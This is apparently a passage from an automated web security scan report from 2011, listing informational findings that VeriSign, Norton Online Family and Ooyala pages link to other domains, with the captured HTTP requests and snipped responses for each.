...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
<br style="clear: left" />
<a style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none" href="https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US">Sign In</a>
...[SNIP]...
<li>
                   <a href="https://www.verisign.com/vtcsslvideo/index.html" target="_blank">Trust Center Enrollment Demo (video) </a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.13. https://knowledge.verisign.com/support/code-signing-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.14. https://knowledge.verisign.com/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.15. https://knowledge.verisign.com/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/digital-id-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.16. https://knowledge.verisign.com/support/eca-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/eca-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/eca-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 42730


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/mpki-for-ssl-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.19. https://knowledge.verisign.com/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 46210


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/trust-seal-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...

14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlinefamily.norton.com
Path:   /familysafety/loginStart.fs

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:55 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/
Set-Cookie: formVersion=1315604755623; Path=/
Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 37906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <
...[SNIP]...
<div id="norton-on-facebook" style="font-size:11px;">
       <a href="https://www.facebook.com/norton?locale=en_US" style="color:#3B5998; font-size:11px; float:left;" target="_blank"><strong>
...[SNIP]...
</div>
       <iframe src="https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&amp;layout=button_count&amp;show_faces=false&amp;send=false&amp;action=like&amp;font&amp;colorscheme=light&amp;ref=NortonOnlineFamily&amp;locale=en_US" scrolling="no" frameborder="0" style="border:none; overflow:hidden; padding-top:5px; height:22px; width:150px;" allowTransparency="true"></iframe>
...[SNIP]...

14.24. http://player.ooyala.com/player.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:25:08 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-afd1a3c3
X-Pad: avoid browser bug
Content-Length: 26306
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:10 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white"><span style="font-size:12px">
...[SNIP]...

14.25. http://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:07 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 52678


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<li><a href="http://www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="http://www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="http://www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="http://www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="http://www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="http://www.verisign.in/">India</a>
...[SNIP]...
<li><a href="http://www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="http://www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="http://www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="http://www.verisign.ch/">Switzerland</a>
...[SNIP]...
<noscript>
                       <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0"
id="s_s" align="" height="72" width="100">

                           <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=query.verisign.com&amp;lang=en">
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft Windows Mobile
Sign In</a>
...[SNIP]...
<li><a href='//www.verisign.ch/contact-information/index.html?tid=footer'>Contact Us</a></li><li><a href='//www.verisign.ch/corporate/index.html?tid=footer'>About
Us</a>
...[SNIP]...
<li><a href='//www.verisign.ch/legal-notices/index.html?tid=footer'>Legal
Notices</a>
...[SNIP]...
<li><a href='//www.verisign.ch/privacy/index.html?tid=footer'>Privacy</a></li><li><a href='//www.verisign.ch/repository/index.html?tid=footer'>Repository</a>
...[SNIP]...
<li><a href='//www.verisign.ch/site-map/index.html?tid=footer'>Site
Map</a>
...[SNIP]...
<a href='javascript:O_LC();'><img
src='//verisign.ch/assets/shared/images/sm_004276_oo.gif' alt='Feedback' style='margin-right:5px;' />
Feedback</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
(NASDAQ: SYMC), provides solutions that allow companies and consumers to engage in communications and commerce online with
confidence. VeriSign Authentication Services include <a href='//www.verisign.ch/ssl/ssl-information-center/index.html'>SSL</a>,
<a href='//www.verisign.ch/ssl/index.html'>SSL Certificates</a>, <a href='//www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html'>Extended
Validation</a> (<a href='//www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html'>EV
SSL</a>), <a href='//www.verisign.ch/trust-seal/index.html'>VeriSign Trust Seal</a>
...[SNIP]...
</a>, <a href='//www.verisign.ch/trust-seal/resources/malware-faq/index.html'>malware scan</a>, <a href='//www.verisign.ch/code-signing/index.html'>code
signing</a>
